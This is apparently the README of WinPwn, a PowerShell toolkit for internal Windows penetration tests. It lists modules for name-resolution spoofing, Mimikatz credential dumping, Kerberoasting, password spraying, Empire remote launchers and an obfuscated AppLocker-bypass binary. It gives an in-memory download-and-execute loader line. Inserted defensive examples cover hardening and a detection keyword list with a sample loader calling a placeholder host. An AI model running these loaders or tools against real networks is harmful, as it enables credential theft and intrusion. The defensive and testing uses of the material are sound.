Automation for internal Windows Penetrationtest / AD-Security - Still much work to do
Latest commit 86b0cc1 Jan 17, 2019
Files in the repository:
  WinPwn_v0.5.ps1 (last commit: Bug Fix Inveigh, Jan 8, 2019)
  Windows PowerShell.png (last commit: Screenshot add, May 30, 2018)
  oBEJHzXyARrq.exe (last commit: Psattack Added, Mar 27, 2018)


Still much work to do - automation for internal Windows penetration tests.

1) Automatic proxy detection
2) Elevated or unelevated detection
3) Forensic mode or pentest mode
	a. Forensics -> Loki + PSRECON + Todo: threat-hunting functions
	b. Pentest -> internal Windows domain system
		i. Inveigh NBNS/SMB/HTTPS spoofing
		ii. Local recon -> Hostenum, SessionGopher, FileSearch, PSRecon
		iii. Domain recon -> GetExploitableSystems, PowerView functions, ACL analysis, ADRecon
			1) Todo: Grouper for Group Policy overview
		iv. Privilege escalation -> PowerSploit (AllChecks), GPP passwords, MS exploit search (Sherlock), WCMDump, JAWS
		v. LaZagne password recovery
		vi. Exploitation -> Kerberoasting, Mimikittenz, Mimikatz with admin rights
		vii. Lateral movement -> FindLocalAdminAccess
			1) Invoke-MassMimikatz || PowerShell Empire remote launcher execution over WMI
			2) DomainPasswordSpray
		viii. Share enumeration
		ix. FindGPOLocation --> search for user/group rights
		x. Find-Fruit
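Step (i) above only works where hosts still answer NBNS broadcasts; Inveigh also answers the related LLMNR multicast queries, which this README does not mention, so the example goes slightly beyond the page and covers both. The following PowerShell is an added defender-side example, not part of WinPwn: it writes the same registry values the corresponding Group Policy settings write to switch those two legacy resolvers off, enables script block logging so modules loaded straight into memory still leave Event ID 4104 records, and checks the result. It assumes an elevated session on a domain-joined host where DNS alone resolves everything the host needs; function names are the example's own.

```powershell
# Added hardening example, not WinPwn code. Run in an elevated PowerShell session.
# Assumption: a domain-joined host on which DNS resolves every name it needs, so the
# broadcast/multicast fallbacks that name-resolution spoofers answer can be switched off.

function Disable-LegacyNameResolution {
    # LLMNR: the value the "Turn off multicast name resolution" policy writes.
    $llmnrKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient'
    if (-not (Test-Path $llmnrKey)) { New-Item -Path $llmnrKey -Force | Out-Null }
    Set-ItemProperty -Path $llmnrKey -Name 'EnableMulticast' -Value 0 -Type DWord

    # NetBIOS over TCP/IP (where NBNS lives): NetbiosOptions = 2 means "disabled", per interface.
    Get-ChildItem 'HKLM:\SYSTEM\CurrentControlSet\Services\NetBT\Parameters\Interfaces' |
        Where-Object { $_.PSChildName -like 'Tcpip_*' } |
        ForEach-Object { Set-ItemProperty -Path $_.PSPath -Name 'NetbiosOptions' -Value 2 -Type DWord }
}

function Enable-ScriptBlockLogging {
    # Makes every script block, including modules loaded directly into memory, appear as
    # Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log.
    $sblKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'
    if (-not (Test-Path $sblKey)) { New-Item -Path $sblKey -Force | Out-Null }
    Set-ItemProperty -Path $sblKey -Name 'EnableScriptBlockLogging' -Value 1 -Type DWord
}

function Test-LegacyNameResolutionDisabled {
    # $true only when LLMNR is off and every Tcpip_* interface has NetBIOS disabled.
    $llmnr = (Get-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient' `
                  -ErrorAction SilentlyContinue).EnableMulticast
    $stillOn = Get-ChildItem 'HKLM:\SYSTEM\CurrentControlSet\Services\NetBT\Parameters\Interfaces' |
        Where-Object { $_.PSChildName -like 'Tcpip_*' } |
        Where-Object { (Get-ItemProperty -Path $_.PSPath).NetbiosOptions -ne 2 }
    return ($llmnr -eq 0) -and (@($stillOn).Count -eq 0)
}

Disable-LegacyNameResolution
Enable-ScriptBlockLogging
Test-LegacyNameResolutionDisabled
```

The NetBIOS setting is read when an interface comes up, so it typically needs a reboot or an adapter reset before the check reports the new state; at scale, set the same values through Group Policy rather than per host.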

Just import the modules with "Import-Module .\WinPwn_v0.5.ps1" or with iex (new-object net.webclient).downloadstring('')
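The iex (new-object net.webclient).downloadstring(...) form above never writes WinPwn_v0.5.ps1 to disk, so file-based controls do not see it; PowerShell script block logging (Event ID 4104) does. The following is an added detection example, not WinPwn code: a small function that scans script-block text for that loader pattern and for the module names this README lists. The sample script blocks are constructed for the example, the indicator list is a short illustration rather than a complete ruleset, and the event property index used in the live variant is an assumption from the 4104 event schema.

```powershell
# Added detection example, not WinPwn code. Indicators and sample events are
# constructed for this illustration.

# Substrings that, in lower case, mark the in-memory loader from the README or one of
# the modules it loads. Assumption: a short illustrative list, not a full ruleset.
$DefaultIndicators = @(
    'new-object net.webclient', 'downloadstring', 'invoke-expression', 'iex ',
    'invoke-mimikatz', 'invoke-wcmdump', 'invoke-kerberoast', 'invoke-massmimikatz',
    'inveigh', 'domainpasswordspray'
)

function Get-SuspiciousScriptBlocks {
    param(
        [Parameter(Mandatory)] [string[]] $ScriptBlockText,
        [string[]] $Indicators = $DefaultIndicators
    )
    foreach ($text in $ScriptBlockText) {
        # Match the way PowerShell reads the code: case-insensitively, and with backticks
        # dropped, since a backtick inside a bareword only changes how the text looks in the log.
        $norm = ($text -replace '`', '').ToLowerInvariant()
        $hits = @($Indicators | Where-Object { $norm.Contains($_) })
        if ($hits.Count -gt 0) {
            [pscustomobject]@{
                Matched = ($hits -join ', ')
                Snippet = $text.Substring(0, [Math]::Min(80, $text.Length))
            }
        }
    }
}

function Get-SuspiciousScriptBlocksFromLog {
    # Live variant: Event ID 4104 in the PowerShell operational log. Property index 2 is
    # the ScriptBlockText field (assumption from the event schema; verify on your build).
    $events = Get-WinEvent -FilterHashtable @{
        LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104
    } -ErrorAction SilentlyContinue
    if ($events) {
        $texts = $events | ForEach-Object { [string]$_.Properties[2].Value }
        Get-SuspiciousScriptBlocks -ScriptBlockText $texts
    }
}

# Constructed sample script-block texts: one loader, one benign command, one module call.
$samples = @(
    "iex (new-object net.webclient).downloadstring('http://example.invalid/WinPwn_v0.5.ps1')",
    'Get-ChildItem C:\Users | Select-Object Name',
    'Invoke-Kerberoast | Out-File C:\temp\hashes.txt'
)
Get-SuspiciousScriptBlocks -ScriptBlockText $samples | Format-Table -AutoSize
```

Script block logging must be enabled for the live variant to have anything to read; on a host where it is, run Get-SuspiciousScriptBlocksFromLog and treat 'iex ' and 'invoke-expression' hits as a prompt to read the surrounding block, since administrators use them legitimately too.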

Functions available after Import:

  1. isadmin -> Checks for local admin access

  2. Inveigh -> Executes Inveigh in a new console window

  3. sessionGopher -> Executes SessionGopher in memory

  4. Mimikatzlocal -> Executes Invoke-WCMDump and then Invoke-Mimikatz, with admin rights

  5. localreconmodules -> Executes different Get-Computerdetails and Just Another Windows Privilege Escalation Script + Winspect

  6. JAWS -> Just Another Windows Privilege Escalation Script gets executed

  7. domainreconmodules -> Different PowerView situational-awareness functions get executed and the output is stored on disk. In addition, a user list for DomainPasswordSpray is stored on disk. An AD report is generated as CSV files (or XLS if Excel is installed) with ADRecon.

  8. Privescmodules -> Executes different privesc scripts in memory (Sherlock, PowerUp, GPP files, WCMDump)

  9. lazagnemodule -> Downloads and executes lazagne.exe (if not detected by AV)

  10. latmov -> Searches the domain for systems with admin access, for lateral movement. Mass-Mimikatz can then be run against the systems found. DomainPasswordSpray for new credentials can also be done here.

  11. empirelauncher -> Launches the PowerShell Empire one-liner on remote systems

  12. shareenumeration -> Invoke-FileFinder and Invoke-ShareFinder from PowerView (PowerSploit)

  13. groupsearch -> FindGPOLocation (PowerView / PowerSploit)

  14. Kerberoasting -> Executes Invoke-Kerberoast in a new window and stores the hashes for later cracking

  15. WinPwn -> Guides the user through all functions/modules with simple questions.

The executable "oBEJHzXyARrq.exe" is an obfuscated version of jaredhaight's PSAttack tool for AppLocker/PowerShell-restriction bypass.


Legal disclaimer:

Usage of WinPwn for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program. Only use for educational purposes.